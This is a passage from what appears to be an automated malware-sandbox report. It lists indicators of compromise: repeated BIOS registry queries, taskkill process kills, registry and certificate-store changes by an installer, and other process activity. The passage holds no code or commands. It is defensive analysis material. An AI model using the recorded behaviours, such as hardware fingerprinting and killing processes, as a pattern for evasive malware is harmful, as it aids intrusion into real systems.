\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS usXF9zucDbMhT_78yRVLnT_L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU usXF9zucDbMhT_78yRVLnT_L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU kPBhgOaGQk.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS kPBhgOaGQk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 6 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 10164 taskkill.exe 5648 taskkill.exe 5764 taskkill.exe 1452 taskkill.exe 3060 taskkill.exe 7556 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
WaaSMedicAgent.execompattelrunner.exeWaaSMedicAgent.exesvchost.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.creddialoghost_cw5n1h2txyewy%5Cresources.pri\1d75a03103a4674\a37dfe62\@{C:\Windows\SystemApps\microsoft.creddialoghost_cw5n1h2txyewy\resources.pri? ms-re = "Microsoft Corporation" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppResolverUX_cw5n1h2txyewy%5Cresources.pri\1d75a03321138c\a37dfe62\@{C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\resourc = "AppResolverUX application" compattelrunner.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MRTCACHE\C:%5CWINDOWS%5CSYSTEMAPPS%5CMICROSOFT.BIOENROLLMENT_CW5N1H2TXYEWY%5CRESOURCES.PRI\1D76C661046D10C\A37DFE62 compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.BioEnrollment_cw5n1h2txyewy%5Cresources.pri\1d781d323729775\a37dfe62 compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AddSuggestedFoldersToLibraryDialog_cw5n1h2txyewy%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.ECApp_8wekyb3d8bbwe%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri\1d75a0312c797d2\a37dfe62 compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.BioEnrollment_cw5n1h2txyewy%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.BioEnrollment_cw5n1h2txyewy%5Cresources.pri\1d781d323729775\a37dfe62\@{C:\Windows\SystemApps\Microsoft.BioEnrollment_cw5n1h2txyewy\resources.pri? ms-reso = "Microsoft Corporation" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppResolverUX_cw5n1h2txyewy%5Cresources.pri\1d75a03321138c\a37dfe62\@{C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\resourc = "App Resolver" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02lrqqzjiojuqmiq\DeviceId = "<Data LastUpdatedTime=\"1626948653\"><User username=\"02LRQQZJIOJUQMIQ\"><HardwareInfo BoundTime=\"1626948652\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"26\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n" svchost.exe -
Modifies registry class 7 IoCs
Processes:
fpnxpWGlulH21GfBlEce4NmL.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings fpnxpWGlulH21GfBlEce4NmL.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ -
Processes:
installer.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
